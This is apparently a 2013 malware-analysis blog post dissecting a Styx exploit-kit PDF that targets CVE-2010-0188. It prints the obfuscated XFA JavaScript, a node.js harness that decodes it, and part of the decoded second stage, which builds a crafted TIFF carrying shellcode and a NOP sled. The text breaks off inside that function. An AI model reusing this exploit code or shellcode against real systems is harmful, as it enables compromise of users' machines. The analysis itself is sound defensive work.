Friday, April 12, 2013

Styx analysis - a peek inside the CVE-2010-0188 PDF



Back to the PDF I fetched from the Styx EK the other day. Let's see what it has inside.

1. Overview of the XwYBSGiPQ.pdf

pdfid gives us an overview:

Let's fire up pyew:


Let's look at that stream:



pdfextract dumps objects, streams, scripts and so on for us:

$pdfextract XwYBSGiPQ.pdf

Nothing but the stream we already saw gets dumped.

2. Details of the PDF stream


<?xml version="1.0"?><xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
<config xmlns="http://www.xfa.org/schema/xci/1.0/"><present><pdf>
<version>1.65</version><interactive>1</interactive><linearized>1</linearized></pdf><xdp><packets>*</packets></xdp><destination>pdf</destination></present></config>
<template xmlns="http://www.xfa.org/schema/xfa-template/2.5/">
<subform layout="tb" locale="en_US" name="ASsQulJ">
    <pageSet>
        <pageArea id="zUgwaCv" name="zUgwaCv">
            <contentArea h="756pt" w="576pt" x="0.25in" y="0.25in"/>
            <medium long="792pt" short="612pt" stock="default"/>
  </pageArea>
 </pageSet>
    <subform h="756pt" w="576pt" name="XgNBk">
        <field h="56mm" name="pgGzgu" w="85mm" x="53.6501mm" y="88.6499mm">
            <event activity="initialize" name="CQIkirHu">
                <script contentType="application/x-javascript">
                    var ZFDIxkYBA = 370;
ZFDIxkYBA+=10;



fGRdP=&quot;&quot;;
dTuOAK='MfSisX';if (dTuOAK=='Wbsid') Qqlxr();var xxnz='qxhn';

WDpZj = &quot;f\n\n noitcnusabocne_46e(ed\n{ )atad   46b rav  = GFEDCBA\&quot;JIHRQPONMLKUTScbaZYXWVfednmlkjihgqpoyxwvutsr10z98765432=/+v    \n;\&quot; ra ,2o ,1o,3o,2h ,1h 3h ib ,4h ,,st\n,0 = i     ca     0 =      \n,e  ,\&quot;\&quot; = cn  \nmt      a_p;][ = rr\n \n{ od      \n1o       = ahc.atadoCr++i(tAed\n;)         2oc.atad =rahi(tAedoC)++      \n;o  atad = 3hc.tAedoCra+i(  \n \n;)+    stib   o = 61 &lt;&lt; 1o || 8 &lt;&lt; 23o     \n \n;   ib = 1h  st &amp; 81 &gt;&gt;3x0     \n;f   tib = 2h&gt; s0 &amp; 21 &gt;f3x      \n;h  stib = 3&gt;&gt; 3x0 &amp; 6 \n;f         4h&amp; stib =x0    \n\n;f3   ra_pmt  a[rb = ]++c.46h(tArahc )1hc.46b +Ara + )2h(t46b(tArahc.)3hc.46b + rah\n;)4h(tA   elihw } i( .atad &lt; nel\n \n;)htg   t = cne _pmnioj.rra''(   \n \n;)er cne nrut}\n;oitcnuf\ng n)(rev_te \n{a rav   _pppa = revv.preVreweioisirtSot.n(gna    \n;)_pppa = revv_palper.re(ec)'' ,'.' \n;elihw   pa(el.rev_ptgn\n{)4 &lt; h   ppa     ev_'0' =+ r \n;er\t\n}   rutIesrap n(tn,rev_ppa01 nuf\n}\n;)itc(worg nodob{)nel ,y  \n(elihw  dobhtgnel.y &lt;   \n{)nel    ydob    =+  \n;ydob}  ter    \nnruus.ydob tsb ,0(gnirnelnuf\n}\n;)itc)(nur no\t\n{_lru ravravPdRGf =  + x\\30=h&amp;\&quot;\&quot;00llehs\t\n; = 
Ox\\8Ex\\\&quot;x\\Ox\\OOx\\OO\\00\\38x\\D5xDEx13x\\5Ox\\Cx\\8x\\46x\\9x\\Bx\\O3x\\17\\B8\\COx\\67xB8xC1x\\67x\\8x\\Ox\\64x\\Bx\\8x\\E7x\\B8\\O2\\63x\\B8x66xF4x\\93x\\1x\\Fx\\57x\\8x\\2x\\FEx\\EB\\OO\\OOx\\OOx1OxFBx\\EEx\\Cx\\Ox\\0Ox\\Fx\\0x\\10x\\00\\FE\\08x\\8Ex10x00x\\00x\\8x\\8x\\AEx\\9x\\1x\\FEx\\2C\\00\\00x\\00x25x08x\\86x\\0x\\0x\\00x\\0x\\0x\\59x\\FF\\FC\\00x\\00x00xAEx\\98x\\8x\\Ex\\2Cx\\1x\\Fx\\00x\\00\\00\\6Fx\\13x10xA8x\\2Cx\\9x\\0x\\53x\\Cx\\0x\\00x\\20\\OO\\BFx\\O8xO0x60x\\47x\\8x\\3x\\C1x\\8x\\2x\\BEx\\64\\EE\\40x\\6Cx23x98x\\00x\\Ex\\Cx\\18x\\Ax\\2x\\10x\\2E\\00\\25x\\00xFFx3Dx\\59x\\0x\\0x\\00x\\0x\\0x\\AEx\\98\\18\\DEx\\2Cx10x00x\\00x\\5x\\Fx\\05x\\2x\\Fx\\7Dx\\59\\00\\00x\\00xA6xA6x\\00x\\0x\\Ex\\98x\\0x\\Ax\\2Cx\\18\\FE\\00x\\00x00x98x\\25x\\Ex\\Cx\\18x\\Ax\\2x\\20x\\B0\\00\\25x\\00xA6xFFx\\00x\\Dx\\0x\\A6x\\0x\\5x\\AEx\\98\\18\\FEx\\2Cx00x00x\\00x\\5x\\9x\\FFx\\2x\\5x\\00x\\BD\\00\\A6x\\00x50xAEx\\98x\\8x\\Ex\\2Cx\\1x\\3x\\00x\\00\\00\\FFx\\25x59x00x\\BDx\\0x\\6x\\00x\\0x\\Ax\\FFx\\00\\59\\00x\\FDx00x00x\\00x\\0x\\0x\\00x\\0x\\0x\\00x\\00\\00\\00x\\00x00x00x\\00x\\0x\\0x\\00x\\0x\\0x\\00x\\00\\00\\00x\\00x27x76x\\56x\\7x\\7x\\67x\\3x\\2x\\23x\\33\\02\\37x\\D2x02x56x\\74x\\7x\\6x\\45x\\4x\\5x\\07x\\D6\\05\\47x\\16x86x00x\\14x\\4x\\6x\\F6x\\Cx\\1x\\C4x\\46\\96\\27x\\26x16x97x\\27x\\4x\\4x\\00x\\1x\\7x\\47x\\56\\05\\F6x\\27x36x46x\\14x\\6x\\6x\\27x\\4x\\5x\\37x\\37\\00\\96x\\75xE6x87x\\54x\\6x\\0x\\36x\\5x\\0x\\87x\\54\\96\\05x\\47x27x36x\\F6x\\6x\\7x\\37x\\5x\\3x\\BBx\\00\\98\\98x\\2Fx7Fx0Cx\\03x\\Ax\\Fx\\57x\\Ex\\Dx\\7Fx\\92\\98\\13x\\9Fx0CxC3x\\EBx\\0x\\0x\\00x\\0x\\0x\\5Bx\\30\\8B\\00x\\10x00xDAx\\66x\\0x\\Bx\\58x\\3x\\8x\\00x\\10\\00\\07x\\B8x87x6Cx\\38x\\1x\\Bx\\30x\\Cx\\5x\\10x\\8B\\00\\D8x\\00xDBx10x\\CBx\\0x\\Ax\\00x\\0x\\Dx\\58x\\30\\8B\\00x\\10x00xDAx\\BAx\\0x\\Bx\\58x\\3x\\8x\\00x\\10\\00\\BAx\\05xDAx58x\\3Ox\\Bx\\Ox\\1Ox\\8x\\Ox\\BAx\\OO\\E5\\BDx\\13xDAx30x\\65x\\8x\\0x\\8Bx\\5x\\1x\\00x\\00\\98\\98x\\6Cx7DxCFx\\15x\\Fx\\5x\\6Ax\\3x\\9
x\\40x\\47\\E5\\BEx\\34x9Ex39x\\E5x\\Dx\\0x\\0Ex\\1x\\3x\\4Cx\\58\\10\\00x\\00x13x69x\\6Fx\\6x\\Cx\\DAx\\6x\\1x\\20x\\0E\\30\\CBx\\58x10x00x\\00x\\8x\\Ax\\6Cx\\9x\\Dx\\58x\\30\\8B\\00x\\10x00xBEx\\3Cx\\1x\\0x\\00x\\0x\\0x\\00x\\00\\00\\00x\\00x00x00x\\00x\\0x\\0x\\00x\\0x\\0x\\00x\\00\\00\\58x\\98x8Bx00x\\10x\\0x\\5x\\65x\\0x\\7x\\85x\\8E\\FF\\FFx\\FFxF5xBAx\\E5x\\0x\\8x\\ECx\\1x\\0x\\BBx\\E3\\47\\BEx\\20xDEx55x\\3Cx\\5x\\4x\\C4x\\2x\\Dx\\E4x\\F4\\E2\\C4x\\44xC4x55x\\00x\\5x\\4x\\C4x\\2x\\4x\\77x\\F6\\E6\\F6x\\C6x16x45x\\46x\\6x\\6x\\64x\\Fx\\9x\\56x\\C6\\14\\55x\\00x37x27x\\56x\\3x\\2x\\23x\\3x\\Ex\\87x\\56\\56s\t\n;\&quot;00xlehlru =+ lav_lihw\t\n;r( eel.llehstgn4401 &lt; hs ) =+ llehx\\\&quot;hs\t\n;\&quot;00lle6esab = e_4hs(edocnlle   \n\t\n;)fi rev_teg( )({)0009 &lt;  \nne      t_do\&quot; = ffiAu+a6x\\35x\\ggg/KB4Lupk///4x\\AAAw/AB1AAAAAAAAAAAAAAA15x\\4x\\B14x\\AA1AeR\\WBi35x\\86x4YPo54x\\oKBx\\14x\\u+j35x\\gg14x\\qb6KBI75x\\v5x\\S14x\\yV8AYi14x\\AAAAAAAAAA14x\\Ax\\A\\BBAAA1415x\\Q24x\\FU55xUQQ24x\\F5x\\q07x\\Eg8mVaB2EEe4x\\UgS4x\\76x\\X0p5\\e4x\\SAJd4x76x\\SBOFgXU4x\\p54x\\\\Q224x\\F55x6x\\TtEpzzA56x\\x\\f6x\\U7F34x\\b4x\\B4U15\\TQB64x\\84xxtIZa4x\\4x\\4x\\D2tId2t9CutI84x\\GtI6x\\Z2sIIx\\aiyXHGIc68U0\\HAeFQ1i17x\\gI396x\\14x4x\\Uyx4eAt74x\\96x\\eCGc\\94x\\BYt84x46x\\DS57X3/a47x\\YSv4x\\MsoZrHAat4Sx\\ArHAHay97x\\e96x\\Lqa5FW9/28PB7x\\4EY911K7x\\StXHAqk55\\jlta4x\\84x\\PQ\&quot;==Qpa7x \n;sle }   { e       \nne = ffit_d\\\&quot; 
x\\A+Bb6xj3515x\\96x\\6x\\f907x\\E8x\\o/////K24x\\w4x\\AAA14AA2\\14x\\AAA14xAAQAAAAAAAAW07x\\AAAx\\O\\96x\\S1414xx\\b6x\\iJW17A+BkKBYI5x\\4x\\a6x\\3x\\3x\\YrEh15407uajb4x\\BiSA\\14x\\AAY14xA14x\\AAAAAA14x\\AAAA4x\\BFUQBBA1FUQpEgjVaQB7x\\Nd6x\\Va1W7MpEgjVqSAAJ0u0Te4x\\Sx\\Cj65x\\q356x\\44x\\4pE7kOP\\JqSC6gIa6x15x\\BpEgx\\U\\M24x\\6436x54x\\3ikl3iw6x\\Y3iMY2i3Y0i94x\\4zig\\Uf4x\\mZ76xLKfd95x\\5x\\Vc4x\\yT24VAcLqe14x\\\\Ai\\JHj724x15x4x\\016x\\I6276x\\1KYsfgE\\d/3NIlv56xo1ia4x\\9eAk1iLxwimt\\co4x\\se14xIL4\\/Eom5Jua7xXrAXY1/b5x\\SSJhTg186x\\6x\\14x\\fx\\46x\\MW256x\\3/14x\\1d6\&quot;lO\n}    \n;    = ffit US\&quot;AAggDAqk\&quot;QC(worg + UQ'002 ,'BF )0 llehs +g +CJk'(wor,'Q\n;)2957    =+ ffit k\&quot; ADEAAAcAAEAAAAIwAAAEQAAAAAEAADAABAADEwAAAAAEBAAAABAADEgBAAAAEAAAAAEAAEEQEAAAAwFAAAAIAAEEIwAAAAEAAAAAwMADEAUCAAAAAAAAISAAA///jADMA\&quot;//fit_dne+\n;fzGgp    .ugeulaVwar = \n}\n;ffitnur(\n;)\n&quot;;
var KgYZ='UnqS';dXeb='tlli';if (dXeb=='BPbFBV') Yvseg='RHcwt';var JiLFEw;
function PJurKUSv(skImfAh,cYzOyPnWt){cYzOyPnWt=cYzOyPnWt.toString();var rWPjuC=&quot;&quot;;var NqEdBYHxb=0;var rOXMsWL=parseInt;for(var i=0;i&lt;skImfAh.length;i++){if((skImfAh.length-i)&gt;=rOXMsWL(cYzOyPnWt.substring(NqEdBYHxb,NqEdBYHxb+1))){for(var i2=i+rOXMsWL(cYzOyPnWt.substring(NqEdBYHxb,NqEdBYHxb+1))+(3-5+1);i2&gt;=i;i2--){rWPjuC+=skImfAh.substring(i2,i2+1);}
i+=rOXMsWL(cYzOyPnWt.substring(NqEdBYHxb,NqEdBYHxb+1))-1;}
else{rWPjuC+=skImfAh.substring(i,i+1);}
NqEdBYHxb++;if(NqEdBYHxb&gt;cYzOyPnWt.length-1){if(NqEdBYHxb!=0)NqEdBYHxb=0;};}
if('kjELBq'=='pMJTc')MIikf();var yCRIn=28;function RXNq(){var dMFUNM='psgyT';if('lnkl'=='efrtju')flNQ();}
app.ZlPhsSeh=rWPjuC;var vuub;function QemqN(){var BSVkx='lKMeKr';if('ANWSSM'=='csYStq')VkeY();}}
var jgjS=47;gWJfmC='Xdvz';if (gWJfmC=='rxQSZ') vUtQDG='TFUs';UZcchX='luvbm';if (UZcchX=='lwxtv') yBEo();

function nUjlj(){}var SolyOF=45;
var pgJpC=xfa.host.numPages;
var TrrE=pgJpC;
var jQDAf = 380-(24%11)+TrrE;
PJurKUSv(WDpZj, jQDAf );
var VKwDSciC = &quot;kSVIeYsh&quot;
jChLB='cKAKS';if (jChLB=='bNJDYH') IQgOkG();var JkFxZW=84;var otAfk='HHFBDb';
var leEpPOjDG='';
var lMybUHrE='rOfeKlvuaUGOQniDqlshIM';
leEpPOjDG += lMybUHrE[3];
leEpPOjDG += lMybUHrE[7];
leEpPOjDG += lMybUHrE[6];
leEpPOjDG += lMybUHrE[8];
leEpPOjDG += lMybUHrE[5];

var kPvi;function cjcXAF(){}
leEpPOjDG = leEpPOjDG.replace(&quot;u&quot;, &quot;&quot;);
FDBpuw = (&quot;rkwUNvPk&quot;)[(VKwDSciC, leEpPOjDG)];
var tAKsEWbR = 'ZlPhsSeh';
var eCDTQ;function fyDCU(){var rwxjqk='MQbZRR';PgEBl='gKaPG';if (PgEBl=='xgzqD') YPGO();}
tAKsEWbR='aps3p.'+tAKsEWbR;
tAKsEWbR=tAKsEWbR.replace(&quot;ps3p&quot;, &quot;pp&quot;);
function pnOkXH(){}var QhSRcq=207;LMunyk='MJKv';if (LMunyk=='obONp') nubS();function oHdY(){var jtAav='CHno';uqCo='ZRZIA';if (uqCo=='ivBaPl') LMIRgd();}
var Itdzqqjus='';
var DjQdjGRE='mWvuzaYFRi.JjpeazHuBcsbHyVIlHp';
Itdzqqjus += DjQdjGRE[5];
Itdzqqjus += DjQdjGRE[13];
Itdzqqjus += DjQdjGRE[13];
Itdzqqjus += DjQdjGRE[10];
Itdzqqjus += DjQdjGRE[14];
Itdzqqjus += DjQdjGRE[2];
Itdzqqjus += DjQdjGRE[5];
Itdzqqjus += DjQdjGRE[27];

muCeJ='KcsrI';if (muCeJ=='hIio') URWv();function OOlYW(){}
FDBpuw(Itdzqqjus+'('+tAKsEWbR+');');
var ktPFXS;var RNdp;var pBanA='xeeH';

                </script>
                </event>
    <ui> 
                    <imageEdit/>
                </ui>
            </field>
        </subform>
    </subform>
</template>
<PDFSecurity xmlns="http://ns.adobe.com/xtd/" accessibleContent="1" change="1" contentCopy="1" documentAssembly="1" formFieldFilling="1" metadata="1" modifyAnnots="1" print="1" printHighQuality="1"/>
<xfa:datasets xmlns:xfa="http://www.xfa.org/schema/xfa-data/1.0/"><xfa:data><ASsQulJ><pgGzgu>Fbeivlcysllwk</pgGzgu></ASsQulJ></xfa:data></xfa:datasets>
<xfdf xmlns="http://ns.adobe.com/xfdf/" xml:space="preserve"><annots/></xfdf>
<form xmlns="http://www.xfa.org/schema/xfa-form/2.8/" />
</xdp:xdp>


OK, so we are dealing with JavaScript. Let's clean it up, simplify it and prepare it for node-js:

malforsec1 = ""; //set string for output

// WDpZj is the scrambled payload copied out of the XFA <script> element
// above (with the HTML entities such as &quot; resolved). It is unreadable
// until PJurKUSv() below reverses it chunk by chunk with the numeric key
// jQDAf; console.log(malforsec1) at the end prints the result.
// NOTE(review): the hex escapes in this copy mix the digit 0 with the
// letter O (e.g. "\\OO", "\\4O"), and the other copies of the same string
// on this page disagree about where. The decoded listing further down and
// the binary dump show \x00 at those places, so the letter O appears to be
// a transcription artefact of the page rather than of the sample.
WDpZj = "f\n\n noitcnusabocne_46e(ed\n{ )atad   46b rav  = GFEDCBA\"JIHRQPONMLKUTScbaZYXWVfednmlkjihgqpoyxwvutsr10z98765432=/+v    \n;\" ra ,2o ,1o,3o,2h ,1h 3h ib ,4h ,,st\n,0 = i     ca     0 =      \n,e  ,\"\" = cn  \nmt      a_p;][ = rr\n \n{ od      \n1o       = ahc.atadoCr++i(tAed\n;)         2oc.atad =rahi(tAedoC)++      \n;o  atad = 3hc.tAedoCra+i(  \n \n;)+    stib   o = 61 << 1o || 8 << 23o     \n \n;   ib = 1h  st & 81 >>3x0     \n;f   tib = 2h> s0 & 21 >f3x      \n;h  stib = 3>> 3x0 & 6 \n;f         4h& stib =x0    \n\n;f3   ra_pmt  a[rb = ]++c.46h(tArahc )1hc.46b +Ara + )2h(t46b(tArahc.)3hc.46b + rah\n;)4h(tA   elihw } i( .atad < nel\n \n;)htg   t = cne _pmnioj.rra''(   \n \n;)er cne nrut}\n;oitcnuf\ng n)(rev_te \n{a rav   _pppa = revv.preVreweioisirtSot.n(gna    \n;)_pppa = revv_palper.re(ec)'' ,'.' \n;elihw   pa(el.rev_ptgn\n{)4 < h   ppa     ev_'0' =+ r \n;er\t\n}   rutIesrap n(tn,rev_ppa01 nuf\n}\n;)itc(worg nodob{)nel ,y  \n(elihw  dobhtgnel.y <   \n{)nel    ydob    =+  \n;ydob}  ter    \nnruus.ydob tsb ,0(gnirnelnuf\n}\n;)itc)(nur no\t\n{_lru ravravPdRGf =  + x\\30=h&\"\"00llehs\t\n; = 
0x\\8Ex\\\"x\\0x\\00x\\00\\OO\\38x\\D5xDEx13x\\50x\\Cx\\8x\\46x\\9x\\Bx\\03x\\17\\B8\\C0x\\67xB8xC1x\\67x\\8x\\0x\\64x\\Bx\\8x\\E7x\\B8\\02\\63x\\B8x66xF4x\\93x\\1x\\Fx\\57x\\8x\\2x\\FEx\\EB\\00\\00x\\00x10xFBx\\EEx\\Cx\\0x\\00x\\Fx\\0x\\10x\\00\\FE\\08x\\8Ex10x00x\\00x\\8x\\8x\\AEx\\9x\\1x\\FEx\\2C\\00\\00x\\00x25x08x\\86x\\0x\\0x\\00x\\0x\\0x\\59x\\FF\\FC\\00x\\00x00xAEx\\98x\\8x\\Ex\\2Cx\\1x\\Fx\\00x\\00\\00\\6Fx\\13x10xA8x\\2Cx\\9x\\0x\\53x\\Cx\\0x\\00x\\20\\00\\BFx\\08x00x60x\\47x\\8x\\3x\\C1x\\8x\\2x\\BEx\\64\\EE\\4Ox\\6Cx23x98x\\00x\\Ex\\Cx\\18x\\Ax\\2x\\10x\\2E\\00\\25x\\00xFFx3Dx\\59x\\0x\\0x\\00x\\0x\\0x\\AEx\\98\\18\\DEx\\2Cx10x00x\\00x\\5x\\Fx\\05x\\2x\\Fx\\7Dx\\59\\00\\00x\\00xA6xA6x\\00x\\0x\\Ex\\98x\\0x\\Ax\\2Cx\\18\\FE\\00x\\00x00x98x\\25x\\Ex\\Cx\\18x\\Ax\\2x\\20x\\B0\\00\\25x\\00xA6xFFx\\00x\\Dx\\0x\\A6x\\0x\\5x\\AEx\\98\\18\\FEx\\2Cx00x00x\\00x\\5x\\9x\\FFx\\2x\\5x\\00x\\BD\\00\\A6x\\00x50xAEx\\98x\\8x\\Ex\\2Cx\\1x\\3x\\00x\\00\\00\\FFx\\25x59x00x\\BDx\\0x\\6x\\00x\\0x\\Ax\\FFx\\00\\59\\00x\\FDx00x00x\\00x\\0x\\0x\\00x\\0x\\0x\\00x\\00\\00\\00x\\00x00x00x\\00x\\0x\\0x\\00x\\0x\\0x\\00x\\00\\00\\00x\\00x27x76x\\56x\\7x\\7x\\67x\\3x\\2x\\23x\\33\\02\\37x\\D2x02x56x\\74x\\7x\\6x\\45x\\4x\\5x\\07x\\D6\\05\\47x\\16x86x00x\\14x\\4x\\6x\\F6x\\Cx\\1x\\C4x\\46\\96\\27x\\26x16x97x\\27x\\4x\\4x\\00x\\1x\\7x\\47x\\56\\05\\F6x\\27x36x46x\\14x\\6x\\6x\\27x\\4x\\5x\\37x\\37\\00\\96x\\75xE6x87x\\54x\\6x\\0x\\36x\\5x\\0x\\87x\\54\\96\\05x\\47x27x36x\\F6x\\6x\\7x\\37x\\5x\\3x\\BBx\\OO\\98\\98x\\2Fx7Fx0Cx\\03x\\Ax\\Fx\\57x\\Ex\\Dx\\7Fx\\92\\98\\13x\\9Fx0CxC3x\\EBx\\0x\\0x\\00x\\0x\\0x\\5Bx\\30\\8B\\00x\\10x00xDAx\\66x\\0x\\Bx\\58x\\3x\\8x\\00x\\10\\00\\07x\\B8x87x6Cx\\38x\\1x\\Bx\\30x\\Cx\\5x\\10x\\8B\\00\\D8x\\00xDBx10x\\CBx\\0x\\Ax\\00x\\0x\\Dx\\58x\\30\\8B\\00x\\10x00xDAx\\BAx\\0x\\Bx\\58x\\3x\\8x\\00x\\10\\00\\BAx\\05xDAx58x\\30x\\Bx\\0x\\10x\\8x\\0x\\BAx\\00\\E5\\BDx\\13xDAx30x\\65x\\8x\\0x\\8Bx\\5x\\1x\\00x\\00\\98\\98x\\6Cx7DxCFx\\15x\\Fx\\5x\\6Ax\\3x\\9x\\4O
x\\47\\E5\\BEx\\34x9Ex39x\\E5x\\Dx\\0x\\0Ex\\1x\\3x\\4Cx\\58\\10\\00x\\00x13x69x\\6Fx\\6x\\Cx\\DAx\\6x\\1x\\20x\\0E\\30\\CBx\\58x10x00x\\00x\\8x\\Ax\\6Cx\\9x\\Dx\\58x\\30\\8B\\00x\\10x00xBEx\\3Cx\\1x\\0x\\OOx\\0x\\0x\\00x\\00\\00\\00x\\00x00x00x\\00x\\0x\\0x\\00x\\0x\\0x\\00x\\00\\00\\58x\\98x8Bx00x\\10x\\0x\\5x\\65x\\0x\\7x\\85x\\8E\\FF\\FFx\\FFxF5xBAx\\E5x\\0x\\8x\\ECx\\1x\\0x\\BBx\\E3\\47\\BEx\\20xDEx55x\\3Cx\\5x\\4x\\C4x\\2x\\Dx\\E4x\\F4\\E2\\C4x\\44xC4x55x\\00x\\5x\\4x\\C4x\\2x\\4x\\77x\\F6\\E6\\F6x\\C6x16x45x\\46x\\6x\\6x\\64x\\Fx\\9x\\56x\\C6\\14\\55x\\00x37x27x\\56x\\3x\\2x\\23x\\3x\\Ex\\87x\\56\\56s\t\n;\"OOxlehlru =+ lav_lihw\t\n;r( eel.llehstgn4401 < hs ) =+ llehx\\\"hs\t\n;\"00lle6esab = e_4hs(edocnlle   \n\t\n;)fi rev_teg( )({)0009 <  \nne      t_do\" = ffiAu+a6x\\35x\\ggg/KB4Lupk///4x\\AAAw/AB1AAAAAAAAAAAAAAA15x\\4x\\B14x\\AA1AeR\\WBi35x\\86x4YPo54x\\oKBx\\14x\\u+j35x\\gg14x\\qb6KBI75x\\v5x\\S14x\\yV8AYi14x\\AAAAAAAAAA14x\\Ax\\A\\BBAAA1415x\\Q24x\\FU55xUQQ24x\\F5x\\q07x\\Eg8mVaB2EEe4x\\UgS4x\\76x\\X0p5\\e4x\\SAJd4x76x\\SBOFgXU4x\\p54x\\\\Q224x\\F55x6x\\TtEpzzA56x\\x\\f6x\\U7F34x\\b4x\\B4U15\\TQB64x\\84xxtIZa4x\\4x\\4x\\D2tId2t9CutI84x\\GtI6x\\Z2sIIx\\aiyXHGIc68U0\\HAeFQ1i17x\\gI396x\\14x4x\\Uyx4eAt74x\\96x\\eCGc\\94x\\BYt84x46x\\DS57X3/a47x\\YSv4x\\MsoZrHAat4Sx\\ArHAHay97x\\e96x\\Lqa5FW9/28PB7x\\4EY911K7x\\StXHAqk55\\jlta4x\\84x\\PQ\"==Qpa7x \n;sle }   { e       \nne = ffit_d\\\" 
x\\A+Bb6xj3515x\\96x\\6x\\f907x\\E8x\\o/////K24x\\w4x\\AAA14AA2\\14x\\AAA14xAAQAAAAAAAAW07x\\AAAx\\O\\96x\\S1414xx\\b6x\\iJW17A+BkKBYI5x\\4x\\a6x\\3x\\3x\\YrEh15407uajb4x\\BiSA\\14x\\AAY14xA14x\\AAAAAA14x\\AAAA4x\\BFUQBBA1FUQpEgjVaQB7x\\Nd6x\\Va1W7MpEgjVqSAAJ0u0Te4x\\Sx\\Cj65x\\q356x\\44x\\4pE7kOP\\JqSC6gIa6x15x\\BpEgx\\U\\M24x\\6436x54x\\3ikl3iw6x\\Y3iMY2i3Y0i94x\\4zig\\Uf4x\\mZ76xLKfd95x\\5x\\Vc4x\\yT24VAcLqe14x\\\\Ai\\JHj724x15x4x\\016x\\I6276x\\1KYsfgE\\d/3NIlv56xo1ia4x\\9eAk1iLxwimt\\co4x\\se14xIL4\\/Eom5Jua7xXrAXY1/b5x\\SSJhTg186x\\6x\\14x\\fx\\46x\\MW256x\\3/14x\\1d6\"lO\n}    \n;    = ffit US\"AAggDAqk\"QC(worg + UQ'002 ,'BF )0 llehs +g +CJk'(wor,'Q\n;)2957    =+ ffit k\" ADEAAAcAAEAAAAIwAAAEQAAAAAEAADAABAADEwAAAAAEBAAAABAADEgBAAAAEAAAAAEAAEEQEAAAAwFAAAAIAAEEIwAAAAEAAAAAwMADEAUCAAAAAAAAISAAA///jADMA\"//fit_dne+\n;fzGgp    .ugeulaVwar = \n}\n;ffitnur(\n;)\n";

function PJurKUSv(skImfAh, cYzOyPnWt) {
    cYzOyPnWt = cYzOyPnWt.toString();
    var rWPjuC = "";
    var NqEdBYHxb = 0;
    var rOXMsWL = parseInt;
    for (var i = 0; i < skImfAh.length; i++) {
        if ((skImfAh.length - i) >= rOXMsWL(cYzOyPnWt.substring(NqEdBYHxb, NqEdBYHxb + 1))) {
            for (var i2 = i + rOXMsWL(cYzOyPnWt.substring(NqEdBYHxb, NqEdBYHxb + 1)) + (3 - 5 + 1); i2 >= i; i2--) {
                rWPjuC += skImfAh.substring(i2, i2 + 1);
            }
            i += rOXMsWL(cYzOyPnWt.substring(NqEdBYHxb, NqEdBYHxb + 1)) - 1;
        } else {
            rWPjuC += skImfAh.substring(i, i + 1);
        }
        NqEdBYHxb++;
        if (NqEdBYHxb > cYzOyPnWt.length - 1) {
            if (NqEdBYHxb != 0) NqEdBYHxb = 0;
        };
    }
//    app.ZlPhsSeh = rWPjuC; @malforsec app is PDF specific
    malforsec1 = rWPjuC;

}

// Second-stage parameters. The sample derives the reversal key from the
// document's page count (xfa.host.numPages); the harness pins that to 2.
var pgJpC = 2;
var TrrE = pgJpC;
var jQDAf = 380 - (24 % 11) + TrrE;   // evaluates to 380

// Un-scramble WDpZj into the global malforsec1.
PJurKUSv(WDpZj, jQDAf);

var VKwDSciC = "kSVIeYsh";

// "euval" is spelled out of lMybUHrE by index, then the u is dropped -> "eval".
var lMybUHrE = 'rOfeKlvuaUGOQniDqlshIM';
var leEpPOjDG = [3, 7, 6, 8, 5].map(function (k) {
    return lMybUHrE.charAt(k);
}).join('');
leEpPOjDG = leEpPOjDG.replace("u", "");

// The sample fetched eval through a property lookup on a string so that the
// name never appears literally. In node this yields undefined (a string has
// no "eval" property); presumably the viewer's older engine resolved it.
// The harness never calls it.
FDBpuw = "rkwUNvPk"[leEpPOjDG];

// "aps3p." -> "app." gives "app.ZlPhsSeh", the slot the sample stored the
// decoded text in.
var tAKsEWbR = 'aps3p.' + 'ZlPhsSeh';
tAKsEWbR = tAKsEWbR.replace("ps3p", "pp");

// "app.eval", again assembled by index.
var DjQdjGRE = 'mWvuzaYFRi.JjpeazHuBcsbHyVIlHp';
var Itdzqqjus = [5, 13, 13, 10, 14, 2, 5, 27].map(function (k) {
    return DjQdjGRE.charAt(k);
}).join('');

// Print the decoded layer instead of handing it to app.eval.
console.log(malforsec1);


Nicer output on this run:


// Layer two as recovered by the harness above, reproduced as decoded.
// This encoder looks like the phpjs base64_encode without its '=' padding
// fix-up: the do/while runs once even for empty input, and a missing
// trailing byte reads as NaN, which the shifts turn into 0 bits, so lengths
// that are not a multiple of three end in 'A' where '=' belongs. run()
// pads the shell buffer to 1044 bytes (a multiple of three) before
// encoding, so the sample never hits that case.
function base64_encode(data) {
    var b64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
    var o1, o2, o3, h1, h2, h3, h4, bits, i = 0,
        ac = 0,
        enc = "",
        tmp_arr = [];
 
    do {
        // Three input bytes per group; charCodeAt past the end is NaN.
        o1 = data.charCodeAt(i++);
        o2 = data.charCodeAt(i++);
        o3 = data.charCodeAt(i++);
 
        bits = o1 << 16 | o2 << 8 | o3;
 
        // Four 6-bit output symbols per group.
        h1 = bits >> 18 & 0x3f;
        h2 = bits >> 12 & 0x3f;
        h3 = bits >> 6 & 0x3f;
        h4 = bits & 0x3f;

        tmp_arr[ac++] = b64.charAt(h1) + b64.charAt(h2) + b64.charAt(h3) + b64.charAt(h4);
    } while (i < data.length);
 
    enc = tmp_arr.join('');
 
    return enc;
}
// Version check of layer two. app.viewerVersion is the viewer's version;
// with the first dot removed and the string right-padded with '0' to four
// characters, 9.3 becomes 9300. Note that 10.x collapses to e.g. 1010,
// which run() then treats as older than 9.0.
function get_ver(){
    var app_ver = app.viewerVersion.toString();
    app_ver = app_ver.replace('.', '');
    while(app_ver.length < 4){
        app_ver += '0';
    }
 return parseInt(app_ver, 10);
}
// Repeats body by doubling until it is at least len characters long and
// returns the first len characters; run() uses it for the 'QUFB' and 'kJCQ'
// filler around the shellcode. Never terminates for an empty body.
function grow(body, len){
    while(body.length < len){
        body += body;
    }
    return body.substring(0, len);
}
// Assembles the crafted TIFF and writes it into the image field pgGzgu
// declared in the XFA template above; the post identifies the bug this
// targets as CVE-2010-0188. Everything concatenated here is base64 text:
// a little-endian TIFF header, 2000 characters of 'QUFB', the encoded
// shellcode, 7592 characters of 'kJCQ' (the 0x90 run visible in the binary
// dump further down), a fixed tag block and one of two version-dependent
// tails.
function run(){
 // fGRdP is defined by the outer layer (not part of this listing) and is
 // appended to the shellcode as a NUL-terminated string.
 var url_var = fGRdP + "&h=03\x00";
 // Shellcode as a binary string. The "\x" at the end of this line and the
 // "6F" at the start of the next are one escape sequence split by the page's
 // line wrapping.
